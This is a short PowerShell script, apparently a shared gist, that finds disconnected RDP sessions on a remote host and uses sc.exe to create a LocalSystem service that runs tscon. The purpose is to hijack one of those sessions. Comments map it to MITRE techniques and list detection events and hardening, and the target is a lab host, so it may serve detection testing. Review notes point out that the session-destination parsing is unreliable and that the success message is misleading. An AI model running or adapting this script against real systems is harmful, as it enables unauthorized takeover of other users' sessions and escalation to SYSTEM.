Created
March 29, 2023 20:44
| # Purpose: enumerate disconnected RDP sessions on a remote host and register a | |
| # service there whose binPath runs tscon against one of them. This matches RDP | |
| # session hijacking (MITRE ATT&CK T1563.002) carried out through remote service | |
| # creation (T1543.003). | |
| # NOTE(review): the hostname suggests a lab target; confirm before reuse. | |
| # | |
| # Telemetry to expect on the target when this runs: | |
| #   - Service Control Manager event 7045 (System log) / 4697 (Security log) for | |
| #     a new service whose image path contains "tscon" and "/dest:rdp-tcp#". | |
| #   - A service name of the form "newsession_<4 digits>" (see below). | |
| # Only `sc.exe create` is issued here; nothing in this script starts or deletes | |
| # the service, so the service entry stays on the host as an artifact. | |
| # Hardening that narrows this path: a time limit that logs off disconnected | |
| # sessions, and restricting who can create services remotely. | |
| # Remote host | |
| $remoteHost = "mswin-server.attackrange.local" | |
| # Get query user output from remote host | |
| $queryUserOutput = (quser /SERVER:$remoteHost) | |
| # Parse disconnected sessions: a line counts when it contains the "Disc" state. | |
| # Capture 1 is the first non-blank token (user name), capture 2 the first | |
| # whitespace-delimited run of digits after it (session ID). | |
| $disconnectedSessionRegex = '^\s*(\S+)\s+(\d+)\s+.*\s+Disc\s+' | |
| $disconnectedSessions = @($queryUserOutput | Where-Object { $_ -match $disconnectedSessionRegex } | ForEach-Object { | |
| @{ | |
| UserName = $matches[1] | |
| SessionId = $matches[2] | |
| } | |
| }) | |
| # Generate a random name for the service (not an RDP session name). | |
| # Get-Random's -Maximum is exclusive, so the suffix is 1000..9998. | |
| $newSessionName = "newsession_" + (Get-Random -Minimum 1000 -Maximum 9999) | |
| # Register a service on the remote host whose command line references the | |
| # disconnected session ID and an rdp-tcp destination. Only the first | |
| # disconnected session found is used. | |
| if ($disconnectedSessions) { | |
| $disconnectedSession = $disconnectedSessions[0] | |
| $sessionId = $disconnectedSession.SessionId | |
| $destinationIdRegex = 'rdp-tcp#(\d+)' | |
| # NOTE(review): -match applied to an array filters lines and does not itself | |
| # populate $matches, so the value read here may come from an earlier match. | |
| # Treat the /dest: value in the resulting binPath as unreliable; verify. | |
| $destinationId = $queryUserOutput -match $destinationIdRegex | ForEach-Object { $matches[1] } | |
| # The service image path is cmd.exe wrapping tscon; services run as LocalSystem | |
| # unless another account is given, and none is given here. A cmd.exe/tscon.exe | |
| # process tree under services.exe is the process-level indicator to hunt for. | |
| $binPath = "cmd.exe /k tscon $sessionId /dest:rdp-tcp#$destinationId" | |
| sc.exe \\$remoteHost create $newSessionName binpath= $binPath | |
| # The message below says "New session created", but what was created is the | |
| # service; sc.exe's exit status is not checked before reporting. | |
| Write-Host "Found disconnected session with ID $($disconnectedSession.SessionId) for user $($disconnectedSession.UserName). New session created with name '$newSessionName'." | |
| } else { | |
| Write-Host "No disconnected sessions found." | |
| } | |